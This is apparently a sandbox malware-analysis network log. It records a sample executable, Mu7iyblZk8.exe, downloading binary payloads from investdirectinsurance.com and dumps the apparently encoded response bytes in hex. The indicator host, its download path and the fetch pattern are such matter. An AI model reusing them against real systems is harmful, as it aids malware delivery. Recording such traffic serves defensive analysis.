                            Host: investdirectinsurance.com
                            Cache-Control: no-cache
                            2024-07-27 09:37:14 UTC677INHTTP/1.1 200 OK
                            Date: Sat, 27 Jul 2024 09:37:14 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 47616
                            Connection: close
                            etag: "ba00-66a2ddbd-31025;;;"
                            last-modified: Thu, 25 Jul 2024 23:20:29 GMT
                            accept-ranges: bytes
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4cQO%2F45RPQp0YH3QQFSUS4pPDpXunFmajZC0BnnJzfHuUO6pAjRpaxauY3pLIs0jiZ5QNVEe0K2uoGTeQ7jeYN4s4pksjmyLmwnDX8vOIgum61zzJiRfkQ5wz3LyXYtQMKW%2FHqkXX6syfO4j"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a9ba64dce9a8c60-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-27 09:37:14 UTC692INData Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc
                            Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
                            2024-07-27 09:37:14 UTC1369INData Raw: 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c 8a 4c ae 69 b1 55 7e 4c 7e d2 4c ea 39 e8 1f 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 61 0e 3e 39 4c ea 23 4c 59 ae bf 8a 8a b2 b4 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 45 4d 2a 2d 4c 6c d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 ec 4c 2b b1 4c 6c 3f 4c ae 60 4c 59 7b 4c 7e e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c 6c db 4c ae 36 4c 59 ac 4c 7e 40 4c
                            Data Ascii: ~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+LlLiU~L~L97L+LlfLLYa>9L#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYEM*-LlL)L~KLLYL+Ll?L`LY{L~LxLY2L+LlcLLYL~LLYJL+'LlL6LYL~@L
                            2024-07-27 09:37:14 UTC1369INData Raw: 5b c4 c2 3f 4c 2b e0 4c 6c 29 0b d8 54 68 dc 35 e0 66 24 1e fb 37 47 41 63 4c 2b 1a 4c 6c 35 e9 2a 14 c4 c2 59 57 42 71 26 72 38 10 e6 10 91 e5 a7 9c 7d b9 7c 1e 67 4c 59 7d 4c 7e 17 5a 4e 50 c4 c2 40 1a cd 5f 9c 7d e9 c6 12 df 4c 59 23 4c 7e bf 5a 4e f8 c4 c2 d0 d7 c1 41 dd 3c 70 a2 67 11 5e c8 9b 4c 7e 47 4c ea 68 ee b9 5e 63 85 c5 51 84 12 9d bf ec 49 ad 77 4c 7e ef 4c ea 02 49 ad 3d 9a 0d 71 fb 78 53 66 a2 ce c4 c2 6c 6e 1e fc a1 06 6e bc 29 67 3d 0a 53 e3 24 c6 9d bf d2 07 01 90 4c 7e 48 4c ea 56 49 ad 83 65 72 a8 31 77 3c 4c ae 62 4c 59 1e c9 8a 61 ba 2c 41 10 e6 49 d7 c1 5a 9c 7d d8 d3 06 da 4c 59 06 4c 7e ba 5a 4e dd c4 c2 d9 5d 79 12 2b 6b c6 b0 b4 59 42 35 7e df ae 8b f5 20 30 a7 e0 e5 4c 2b 9c 4c 6c 96 7c 1e a7 10 e6 21 df ae 3f 09 9c e1 9e 49
                            Data Ascii: [?L+Ll)Th5f$7GAcL+Ll5*YWBq&r8}|gLY}L~ZNP@_}LY#L~ZNA<pg^L~GLh^cQIwL~LI=qxSflnn)g=S$L~HLVIer1w<LbLYa,AIZ}LYL~ZN]y+kYB5~ 0L+Ll|!?I
                            2024-07-27 09:37:14 UTC1369INData Raw: 6f d9 a7 42 97 c8 92 47 88 4c 59 97 4c 7e eb 5a 4e d0 eb 1d d5 b7 22 b5 4c 6c 4f e9 2a 61 a9 5c 7f 4c 7e d3 4c ea 52 c4 c2 b7 8e e8 f1 b2 b4 67 4c ae b5 92 26 20 4c 7e 38 4c ea 22 4c 59 72 e4 f1 13 4c 6c df 4c ae 0d 10 e6 98 4c 7e 50 6b 7e e5 74 32 70 bd 88 81 67 e2 a4 59 8a 07 74 32 6b 87 d1 57 a0 07 13 99 3e cd 6b bd 84 0e 2c 5c 59 8a af 74 32 fb 78 e9 ff a0 07 43 74 32 87 cc a9 78 5a 08 96 0e ec a9 3a 4d e9 50 84 b4 04 d1 1e 11 e7 a0 85 52 62 5f bf ea 1b c8 23 0c 19 1d c9 8a ef 76 e3 79 4c 59 b7 1a cd 7d 0a 59 62 4c ae d9 4c 59 05 4c 7e 23 a6 f0 86 8c 98 7b 6f d9 26 4c 6c e3 b7 b3 37 4c 59 ad 4c 7e 41 4c ea 43 47 41 e7 4c 2b 9e 4c 6c 0b a5 60 4f 4c 59 c5 9b 5a f5 26 72 1a 74 32 6d ac 58 d2 5d bc a6 a4 61 f7 3a 4d 17 e0 66 6c 47 90 41 f3 14 50 df f9 d0
                            Data Ascii: oBGLYL~ZN"LlO*a\L~LRgL& L~8L"LYrLlLL~Pk~t2pgYt2kW>k,\Yt2xCt2xZ:MPRb_#vyLY}YbLLYL~#{o&Ll7LYL~ALCGAL+Ll`OLYZ&rt2mX]a:MflGAP
                            2024-07-27 09:37:14 UTC1369INData Raw: 6c 58 dc fc 66 4c 59 7c 4c 7e 5e a1 06 7e 4c 59 83 9a 0d 88 4b 18 c4 7c 1e 15 30 95 f1 9e ef ee ca 1e 21 4c 59 4d 4c 2b 94 a9 a8 b2 20 e4 14 da 7c d9 0d 3c 46 4c ea 99 4c 59 23 6f d9 4c 1a 48 9a 73 36 c9 ee b9 0d 41 96 79 eb fc 75 4c 59 94 47 d2 df b0 b6 6a 4c ae d5 4c 59 a9 2a ba 37 da cc f9 db 7d 6b a3 07 5e 2c 0c 85 dc fc 8e fd 68 d9 30 36 98 1e fb df 91 25 ef 4c 2b b2 4c 6c 49 e9 2a f8 84 82 67 63 e4 e5 4c ea 7b 4c 59 54 38 6d bf c8 d9 44 48 9b db 4c 59 07 4c 7e 20 a6 f0 85 8c 98 78 6f d9 25 4c 6c e0 b7 b3 34 4c 59 af 4c 7e 43 4c ea 40 47 41 e4 4c 2b 9d 4c 6c 08 a5 60 4c 4c 59 c7 9b 5a f7 26 72 19 74 32 2e ec 1b d1 5d bc a5 a4 61 f4 3a 4d 14 e0 66 6e 47 90 02 b1 55 52 df f9 d2 67 e2 86 fb fb ce 78 0d e4 0e 3e 68 6b 7e be 47 41 87 85 52 b3 29 68 a8 5c
                            Data Ascii: lXfLY|L~^~LYK|0!LYML+ |<FLLY#oLHs6AyuLYGjLLY*7}k^,h06%L+LlI*gcL{LYT8mDHLYL~ xo%Ll4LYL~CL@GAL+Ll`LLYZ&rt2.]a:MfnGURgx>hk~GAR)h\
                            2024-07-27 09:37:14 UTC1369INData Raw: 0f 9e 49 ec 75 f1 57 47 90 e3 ce da 18 6b bd 52 0e 2c 09 59 8a 9b 47 41 e7 50 84 6f 97 c0 4b 9e 49 5d 62 84 d5 c2 17 93 5e 3c 1c 78 0d 37 0e 3e ab 7b ae 7e 54 50 38 4c 2b 21 a9 a8 4c 48 9b d7 4c 59 0f 4c 7e 33 4c ea f0 c4 c2 c5 8e e8 99 a9 a8 d5 4c ae 15 00 74 93 4c 7e 4b 4c ea 90 4c 59 26 91 e5 b1 4c 6c 3f 4c ae ae 10 e6 7b 4c 7e d0 da cc 1e eb 1d 27 0a 1e 88 0d 2f 63 4c ae d8 4c 59 34 3d 4e 88 6b 7e 1e 47 41 dd 4b 5e 37 5d bc ca 9d bf 15 2f 7a ac 4c 7e 40 4c ea ea eb 1d 05 6f d9 8e 9c 7d be e0 24 4e 4c 59 70 4c 7e 8e 7b ae 63 5e c8 bf fe ca c3 4c 6c 4c 4c ae a5 eb 1d 3d 4a 48 01 eb fc 09 4c 59 7b 47 d2 37 b0 b6 d0 4c ae 39 4c 59 52 2a ba 01 36 a2 ac 54 50 e9 4c 2b 7c 51 84 1f 48 9b 91 bb cd 5e 4c 7e d6 6b 7e 49 bb cd 17 4c 2b e8 1a 48 fd 02 d7 dc fd 68
                            Data Ascii: IuWGkR,YGAPoKI]b^<x7>{~TP8L+!LHLYL~3LLtL~KLLY&Ll?L{L~'/cLLY4=Nk~GAK^7]/zL~@Lo}$NLYpL~{c^LlLL=JHLY{G7L9LYR*6TPL+|QH^L~k~IL+Hh
                            2024-07-27 09:37:14 UTC1369INData Raw: 4c 7e 77 6d 5a 89 5e c8 26 ba ed b9 4c 6c 83 4c ae ec 49 ad 76 4d 7f b4 80 36 74 4c 59 3a 4c 2b f5 7e 9c be b8 bb 4a e1 05 0c 4c 7e 30 4c ea 3e ee b9 97 1f 3a b4 16 83 d7 4c ae 3e 4c 59 54 2a ba 49 4d eb 05 1a fe ee 4c 2b b3 4c 6c 9c 7c 1e b3 5e c8 f4 f2 b6 e4 4c ea 7a 4c 59 b5 1a cd ca 4d 6d 8a 80 54 da 4c 59 06 4c 7e ae 6d 5a f3 da 7c 37 05 91 24 4c 6c d8 4c ae 95 ee b9 3f 9e ef ed 40 b4 ad 4c 59 e5 4c 2b 78 a9 a8 37 4d af 8f ce da 72 4c 7e ea 4c ea d1 ee b9 0e 1f 3a 22 ef 8c 4e 4c ae d1 4c 59 8d 2a ba 14 4d eb e3 10 e6 43 4c 2b 2a 4c 6c 21 7c 1e 2e da 7c 1b 74 f0 bd 4c ea a7 4c 59 08 6f d9 87 9c 7d 63 d5 00 47 4c 59 5d 4c 7e 27 5a 4e 5e 4d 58 02 a9 3d 7e 4c 6c 45 4c ae 0c ee b9 d0 9e ef 43 42 b6 00 4c 59 bc 4c 2b a5 a9 a8 ec 4d af 2a c4 c2 ab 4c 7e b7
                            Data Ascii: L~wmZ^&LlLIvM6tLY:L+~JL~0L>:L>LYT*IML+Ll|^LzLYMmTLYL~mZ|7$LlL?@LYL+x7MrL~L:"NLLY*MCL+*Ll!|.|tLLYo}cGLY]L~'ZN^MX=~LlELCBLYL+M*L~
                            2024-07-27 09:37:14 UTC1369INData Raw: a2 c1 cb 6e c9 7e 49 e0 2b 6b 32 15 c0 f1 cb 6e f2 63 e4 92 6d 5a 20 54 50 76 6c db 2c 4c 6c 86 dc fc a3 25 62 42 5e 6e 0b 0e a8 a9 35 71 ed 4c 2b b0 4c 6c 3e 4c ae 0b 76 31 89 6e 1e 89 31 96 fd 49 ad 63 5d 79 63 67 e2 72 5c 3e 98 0f 1a fe 13 c6 1d 4c ea 07 4c 59 4b 4c 2b 4e c0 14 41 15 c0 43 49 ad 7d df ae dd 31 96 3e 5e c8 a6 0e 6a 9e 4c 6c 35 4c ae eb 49 ad 71 4c 7e 2f 5a 4e f7 49 ad 4c 5d 79 4c 67 e2 e9 e9 2a 8c 42 35 e2 75 f1 87 de 7a 4a 0f 1a b8 c6 13 29 4c 6c d1 4c ae 38 4c 59 cf 53 86 85 a0 07 3e c4 c2 22 91 e5 7d 51 84 00 a5 60 74 ee b9 e3 e0 66 6c a1 06 ec ee b9 fb 62 84 47 66 e3 cb c6 12 96 91 25 e6 1b db bb fc 49 02 4c 59 85 63 85 83 7e 9c f0 50 84 a2 9e 49 36 63 e4 54 6d 5a 11 10 e6 01 6f d9 47 b2 b4 e5 3a 79 b1 02 76 60 7a ea fc 6d 5a 4d c4
                            Data Ascii: n~I+k2ncmZ TPvl,Ll%bB^n5qL+Ll>Lv1n1Ic]ycgr\>LLYKL+NACI}1>^jLl5LIqL~/ZNIL]yLg*B5uzJ)LlL8LYS>"}Q`tflbGf%ILYc~PI6cTmZoG:yv`zmZM
                            2024-07-27 09:37:14 UTC1369INData Raw: 47 4c 2b 6a 4b 18 cd b0 b4 9f ee b9 cd a6 a2 f7 47 90 9d d3 67 04 71 d5 87 d9 c9 13 b0 b4 cf 30 95 43 74 f0 07 6d 5a 16 74 32 3f a0 04 f2 f5 b0 94 98 4b c4 c4 c2 a3 2a ba 43 17 42 94 1f 89 a2 63 85 a9 05 90 2c cb 18 e0 78 0d 14 74 f0 c7 5a 4e ec 0c 19 71 aa 3e 7e ed 8e 37 4c ae dc 1f 89 c8 82 54 fb de 7a 82 bc 29 4e 5d 79 07 a9 a8 bb b9 ba 22 ee b9 d4 63 e4 bc 17 42 e2 10 e6 ea d7 c1 32 d6 41 e8 40 94 46 e4 a1 3e 63 e4 ec 5c ba af 54 50 ea 4c 2b 38 66 e3 68 dc fc 43 a9 5c 89 d8 18 d4 6b 7e 8b 7b 0e 81 29 fd 6e 9c 7d b9 b7 b3 ee 4c 59 02 4c 7e 6e 7b ae 01 4c 59 b8 78 2e b4 b8 38 ec 4c ae 31 4c 59 7e 39 aa d1 09 9c f0 e0 04 a0 0e 6a 98 4c 6c 32 4c ae 61 d1 65 9b 16 00 4f cf 28 8c 05 02 1b 4c 2b 74 4c 6c 7a 7c 1e 74 5e c8 fb 88 cb 11 4c ea fd 4c 59 f3 38 6d
                            Data Ascii: GL+jKGgq0CtmZt2?K*CBc,xtZNq>~7LTz)N]y"cB2A@F>c\TPL+8fhC\k~{)n}LYL~n{LYx.8L1LY~9jLl2LaeO(L+tLlz|t^LLY8m
                            2024-07-27 09:37:14 UTC1369INData Raw: 8c ec b0 c0 14 51 fd 68 7b 4c 7e e7 4c ea 1e eb 1d 17 78 2e 1f b8 38 b6 b8 bb db 4e 5b 04 4c 7e 1c 4c ea 36 ee b9 9f 0a 1e 0d 83 56 db 4c ae 36 4c 59 4c 3d 4e 01 0e a8 18 08 ef fe e4 f1 9f 4c 6c 34 4c ae 03 74 32 d3 3e 4d 05 c4 50 c3 fd 68 1d 4c 2b c3 4c 6c 0a 0b d8 e7 a9 5c 9e 39 aa 23 4b df 0a 4e 5b 41 4c 2b 28 4c 6c 22 7c 1e 2c da 7c 8c 11 c5 be 4c ea a5 4c 59 0b 6f d9 d6 0d 2f ea 1e 7c 5d 47 41 5e 4c 7e e2 4c ea 10 74 32 a2 cb dc f2 42 97 67 6d 8f ed 4c 59 01 4c 7e 6d 7b ae f4 a9 5c db 48 5d f5 fa 79 ec 4f ad 33 4c 59 a9 4c 7e 55 6d 5a 3e da 7c c9 c5 10 9a 4c 6c 31 4c ae 7b ee b9 14 0d 3c 98 28 3c f3 49 ad 18 4c 2b 76 4c 6c f7 02 d7 01 5b bc 30 91 44 32 3f cb ff 4c 59 b4 4c 2b 49 4b 18 e0 48 9b 08 bb cd 36 7b eb b9 4e e9 a0 4c 59 cc 4c 2b 61 7e 9c 2a
                            Data Ascii: Qh{L~Lx.8N[L~L6VL6LYL=NLl4Lt2>MPhL+Ll\9#KN[AL+(Ll"|,|LLYo/|]GA^L~Lt2BgmLYL~m{\H]yO3LYL~UmZ>|Ll1L{<(<IL+vLl[0D2?LYL+IKH6{NLYL+a~*


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.949707104.21.65.794437560C:\Users\user\Desktop\Mu7iyblZk8.exe
                            TimestampBytes transferredDirectionData
                            2024-07-27 09:37:14 UTC130OUTGET /assuence/litesolidCha/Miox.bd HTTP/1.1
                            User-Agent: Mozilla/5.0
                            Host: investdirectinsurance.com
                            Cache-Control: no-cache
                            2024-07-27 09:37:15 UTC681INHTTP/1.1 200 OK
                            Date: Sat, 27 Jul 2024 09:37:15 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 549888
                            Connection: close
                            etag: "86400-66a37fb9-2699a;;;"
                            last-modified: Fri, 26 Jul 2024 10:51:37 GMT
                            accept-ranges: bytes
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQi7wg97weBTNKFR5a3%2BSi%2FqH4vk0qtKikuDjflcNjcgMNKVJ81vaXgKm5eWhSD2PYuVwW3hgQmAQxui8ZQqPPwa9AtlCj5BGy2%2FxC55TvAiPBltqkPj2LED7R37WlJFQRt5IrwAU3aSc4GQ"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a9ba6548fe917d9-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-27 09:37:15 UTC688INData Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc
                            Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
                            2024-07-27 09:37:15 UTC1369INData Raw: ce da 9c 4c 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c 79 fe df 1a 90 24 ea 9b 5a d2 4c ea e1 27 61 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 21 4c 7e a5 26 72 23 4c 59 ac bc 89 ae 05 90 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 05 0e 6a 81 b2 b4 d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 fc df f9 fc a7 21 ab 59 8a 60 4c 59 0a ac 9c e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c 6c db 4c ae 36 4c 59 ac
                            Data Ascii: L~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+Lly$ZL'a7L+LlfLLY!L~&r#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYjL)L~KLLY!Y`LYLxLY2L+LlcLLYL~LLYJL+'LlL6LY
                            2024-07-27 09:37:15 UTC1369INData Raw: 7e da 4c ea 4f 10 e6 3f 4c 2b 0e 05 90 41 b0 b4 1f 30 95 d1 74 f0 b9 10 66 1a fd 68 e8 37 e2 aa 7e 9c 05 59 8a 06 d5 d0 b9 f6 72 4d 4c ea 97 4c 59 28 6f d9 56 7e 9c b7 c0 14 7f 47 41 7d 4c 7e d1 4c ea 38 eb 1d a0 29 fd 63 22 e5 59 66 a2 df 4c 59 23 4c 7e 9b 6d 5a 3c c3 b5 c2 47 d2 a1 7e 9c dd 4c ae 80 4c 59 ef c9 8a 84 cc 2a bc 3a 4d d6 9a 0d 30 47 d1 77 0b d8 26 15 11 c0 eb 78 c0 a6 f0 02 49 ad 37 b7 22 f6 7c 9e 6b 4c ae 26 ee b9 e4 74 f0 b4 5a 4e 81 f5 b2 ca 91 e5 2f 4c 6c d7 4c ae 7a eb 1d 48 e0 66 e4 17 42 69 f5 b2 25 91 e5 b3 4c 6c 3c 4c ae 05 eb 1d 6c 7a ea d8 21 c6 65 c4 c2 49 d7 c1 60 66 e3 d8 d3 06 fb fd 68 69 b7 30 1e 4c ea ad e4 a1 67 14 01 34 5d bc 06 73 36 9f f5 b2 42 e0 66 42 4c ea ad 4c 59 a3 38 6d a8 fb 78 8a 66 a2 b3 c4 c2 21 df ae 51 a1
                            Data Ascii: ~LO?L+A0tfh7~YrMLLY(oV~GA}L~L8)c"YfLY#L~mZ<G~LLY*:M0Gw&xI7"|kL&tZN/LlLzHfBi%Ll<Llz!eI`fhi0Lg4]s6BfBLLY8mxf!Q
                            2024-07-27 09:37:15 UTC1369INData Raw: 0d a9 5c 60 4c 2b 07 31 77 32 cd 2f a0 d1 65 97 4c 7e 20 36 a2 94 4c 59 d8 4c 2b b5 4c 6c bb 7c 1e 64 4c 59 7f 4c 7e 5c a1 06 7c 4c 59 27 1f 3a 50 10 c5 5b 66 a2 dc 4c 59 a4 2a ba 5c 7b ae 2b 54 50 4e 4c 2b 97 a9 a8 da 48 9b 82 4c 59 86 63 e4 c5 8e 6b be 3a 4d d2 4c 2b d4 c2 17 80 4c ae 6a 4c 59 74 4c 7e 26 10 66 76 4c 59 39 4c 2b 68 66 e3 68 4c ae c7 5e c8 a3 f3 b7 3e 21 c6 0d 4c 59 e1 1a cd 68 4b 18 32 e9 2a 1f 2f 7a 86 7a ea 62 21 c6 d9 15 11 33 d7 c1 41 6e 4d b6 c6 12 61 4c 59 59 fc cc 95 7d 8a 74 54 50 6f b2 55 0e a9 a8 b3 9d bf 3a 7c a8 29 f6 72 1d 4c ea a3 49 ad 28 7e 49 2f a2 65 da 4c ae 67 1f 89 a8 88 cb 41 4c ea 50 97 92 25 8e e8 6e 7e 9c 35 4c ae 15 e0 04 7d f6 72 e9 4c ea 73 4c 59 b8 1a cd c2 4c 6c 4d 4c ae 5c 10 e6 0b 4c 7e 4c e5 b0 bc eb 1d
                            Data Ascii: \`L+1w2/eL~ 6LYL+Ll|dLYL~\|LY':P[fLY*\{+TPNL+HLYck:ML+LjLYtL~&fvLY9L+hfhL^>!LYhK2*/zzb!3AnMaLYY}tTPoU:|)rLI(~I/eLgALP%n~5L}rLsLYLlML\L~L
                            2024-07-27 09:37:15 UTC1369INData Raw: 5d 79 88 66 e3 f4 80 54 cd f5 b2 ee 5d 6c d0 4c ea 7e 4c 59 71 38 6d cf 4c 6c d5 ed 0f 39 49 ad 89 91 44 e2 80 36 21 4c 59 4d 4c 2b 64 4b 18 e2 b0 b4 b1 ee b9 97 72 77 46 4c ea 33 10 e6 23 6f d9 9d 0a 59 82 4c ae 69 4c 59 76 4c 7e d4 23 c5 16 6e 38 3b 4c 2b c4 4c 6c 5e 59 8a d5 4c 59 0d 4c 7e 31 4c ea 0e 4d 58 47 4c 2b 2e 4c 6c d6 4c ae 7a ea 1c 91 4c 7e 49 4c ea 93 4c 59 a8 38 6d be e4 60 3d 4c ae 63 4c 59 7f eb 78 e5 4c ea 7b 4c 59 30 4c 2b ca 4c 6c 61 4c ae db 4c 59 07 4c 7e 8b 6b 7e 04 4c 59 48 4c 2b 25 4c 6c e9 bc 9e 34 4c 59 af 4c 7e 43 4c ea 9a cb 6e d8 a3 07 9d 4c 6c 37 4c ae 4a ab 5e 7f f6 72 eb 4c ea 70 4c 59 39 9a 0d c1 4c 6c 4f 4c ae d0 4c 59 08 4c 7e 14 4c ea 0a 4c 59 42 4c 2b f7 31 77 11 cd 2f ee 1a fe a4 4c 7e 75 11 67 fa e1 05 ea 4c 2b 97
                            Data Ascii: ]yfT]lL~LYq8mLl9ID6!LYML+dKrwFL3#oYLiLYvL~#n8;L+Ll^YLYL~1LMXGL+.LlLzL~ILLY8m`=LcLYxL{LY0L+LlaLLYL~k~LYHL+%Ll4LYL~CLnLl7LJ^rLpLY9LlOLLYL~LLYBL+1w/L~ugL+
                            2024-07-27 09:37:15 UTC1369INData Raw: 6c 66 4c ae 9b eb 1d c4 0b 0b 59 ae 9a 23 4c 59 4f 4c 2b 12 4c 6c eb b8 bb 54 99 3e 99 4c 7e 45 4c ea 6b ee b9 f2 3d 0a 4e 1a 48 88 62 a7 21 f3 14 10 3b a8 ff dc 78 b6 cc d8 98 6f d9 c6 4c 6c 69 4c ae 00 3a 4d dc 9e ef 7c 61 84 0c 4c 59 44 4c 2b 69 4b 18 04 5e 3c e5 e0 04 88 63 e4 4b 4c ea 90 4c 59 d4 a3 07 1c 47 d1 88 6b a8 66 cb 6e 58 fc cc 76 1e fb 8d 7b 0e 32 4c 2b c9 4c 6c 04 0b d8 bc 7a 0f ca 16 00 82 97 c0 21 cb 6e b9 ef 19 f4 9c 7d be 18 cb 36 4c 59 ac 4c 7e f4 7b ae f8 7a 0f 77 1f 3a 3a eb e9 34 4c ae 4e 4c 59 16 c9 8a 79 1e fb 4b a7 e0 1d 4c 2b c3 4c 6c 0a 0b d8 d3 4d 58 9d 3b a8 16 4c ea 09 4c 59 71 6f d9 fe fa 79 85 fb fb 39 4c 59 a6 4c 7e 5e 6d 5a 2c d5 d0 78 1f 3a 94 4c 6c 3a 4c ae 03 eb 1d 6b 7b eb 37 09 9c 5d 4c 59 17 4c 2b dc 7e 9c a9 a5
                            Data Ascii: lfLY#LYOL+LlT>L~ELk=NHb!;xoLliL:M|aLYDL+iK^<cKLLYGkfnXv{2L+Llz!n}6LYL~{zw::4LNLYyKL+LlMX;LLYqoy9LYL~^mZ,x:Ll:Lk{7]LYL+~
                            2024-07-27 09:37:15 UTC1369INData Raw: 80 4c 59 b3 f6 72 8a 50 24 9e cb 6e d6 9a 0d 9b bd 5f 12 9d bf 1d 7b 0e 77 4c 7e ef 4c ea 32 eb 1d cc 68 bf 48 47 d1 54 50 84 29 c1 b6 fc fc cc 21 1e fb 59 7b 0e 46 4c 2b 2f 4c 6c 90 0b d8 e8 7a 0f 81 9e ef 75 c7 53 92 4c 59 ee 4c 2b d7 4b 18 2d 9d bf 53 fd 68 78 4c 7e e4 4c ea 1d eb 1d 30 4d 2a 8a 0d 2f 60 4c ae da 4c 59 36 3d 4e 2b 4b df 47 0f 1a 49 4c 2b 24 4c 6c 2a 7c 1e ff d5 d0 b7 44 53 42 4c ea ad 4c 59 a3 38 6d a9 fa 79 75 0d ef 4d 4c 59 72 4c 7e 09 6d 5a bf 10 e6 73 f5 61 25 99 8b e4 e4 21 d1 4c 59 09 4c 7e 97 8d 68 34 f5 b2 56 cb dc 2a 4c 6c d2 4c ae 5f eb 1d 73 59 98 51 26 72 9b d1 65 eb 4c 2b 55 ce af 97 c0 14 72 5b bc 5d 4c 7e e1 4c ea 18 eb 1d ae 47 d2 57 74 71 45 4c ae ef 4c 59 b7 c9 8a 16 76 e3 24 3a 4d 86 63 85 75 78 fb c3 b0 b4 cc e1 05
